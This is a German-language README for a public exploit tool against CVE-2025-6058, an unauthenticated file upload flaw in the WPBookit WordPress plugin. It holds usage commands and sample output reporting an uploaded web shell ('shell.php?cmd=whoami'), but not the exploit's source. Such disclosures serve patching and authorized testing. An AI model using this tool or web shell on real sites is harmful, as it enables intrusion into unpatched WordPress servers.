
WPBookit <= 1.0.4 - Unauthentifizierter beliebiger Datei-Upload
Das WPBookit-Plugin für WordPress ist anfällig für beliebige Datei-Uploads aufgrund fehlender Dateitypüberprüfung in der image_upload_handle()-Funktion, die über die add_booking_type-Route in allen Versionen bis einschließlich 1.0.4 eingehängt ist.
Diese Schwachstelle ermöglicht es nicht authentifizierten Angreifern, beliebige Dateien auf den Server der betroffenen Website hochzuladen, was potenziell zu Remote-Code-Ausführung führen kann.
| CVE | CVSS-Wert | Öffentlich veröffentlicht | Letzte Aktualisierung |
|---|---|---|---|
| CVE-2025-6058 | 9.8 (Kritisch) | 11. Juli 2025 | 12. Juli 2025 |
Dieser Exploit automatisiert den Prozess von:
python3 CVE-2025-6058.py -u http://target.com/wordpress
python3 CVE-2025-6058.py -u http://target.com/wordpress
python CVE-2025-6058.py -help
______ __ __ ________ ______ ______ ______ _______ ______ ______ _______ ______
/ \ / | / |/ | / \ / \ / \ / | / \ / \ / | / \
/$$$$$$ |$$ | $$ |$$$$$$$$/ /$$$$$$ |/$$$$$$ |/$$$$$$ |$$$$$$$/ /$$$$$$ |/$$$$$$ |$$$$$$$/ /$$$$$$ |
$$ | $$/ $$ | $$ |$$ |__ ______$$____$$ |$$$ \$$ |$$____$$ |$$ |____ ______ $$ \__$$/ $$$ \$$ |$$ |____ $$ \__$$ |
$$ | $$ \ /$$/ $$ |/ |/ $$/ $$$$ $$ | / $$/ $$ \ / |$$ \ $$$$ $$ |$$ \ $$ $$<
$$ | __ $$ /$$/ $$$$$/ $$$$$$//$$$$$$/ $$ $$ $$ |/$$$$$$/ $$$$$$$ |$$$$$$/ $$$$$$$ |$$ $$ $$ |$$$$$$$ | $$$$$$ |
$$ \__/ | $$ $$/ $$ |_____ $$ |_____ $$ \$$$$ |$$ |_____ / \__$$ | $$ \__$$ |$$ \$$$$ |/ \__$$ |$$ \__$$ |
$$ $$/ $$$/ $$ | $$ |$$ $$$/ $$ |$$ $$/ $$ $$/ $$ $$$/ $$ $$/ $$ $$/
$$$$$$/ $/ $$$$$$$$/ $$$$$$$$/ $$$$$$/ $$$$$$$$/ $$$$$$/ $$$$$$/ $$$$$$/ $$$$$$/ $$$$$$/
Exploit By : Khaled Alenazi (Nxploited ) GitHub: https://github.com/Nxploited
usage: CVE-2025-6058.py [-h] -u URL
CVE-2025-6058 WPBookit <= 1.0.4 - Unauthenticated Arbitrary File Upload | by Khaled Alenazi (Nxploited)
options:
-h, --help show this help message and exit
-u, --url URL Target URL e.g http(s)://target.com/wordpress
[*] Checking plugin version ...
[*] Exploiting file upload ...
[+] Exploitation successful!
[+] Shell path: wp-content/uploads/2025/07/shell.php?cmd=whoami
Exploit By : Khaled Alenazi (Nxploited ) GitHub: https://github.com/Nxploited
Dieses Tool wird ausschließlich zu Bildungs- und autorisierten Sicherheitstestzwecken bereitgestellt.
Der Autor übernimmt keine Verantwortung für Missbrauch oder unbefugte Aktivitäten.
Verwendung auf eigenes Risiko und stellen Sie immer sicher, dass Sie die Erlaubnis haben, das Zielsystem zu testen.
Von: Khaled Alenazi (Nxploited)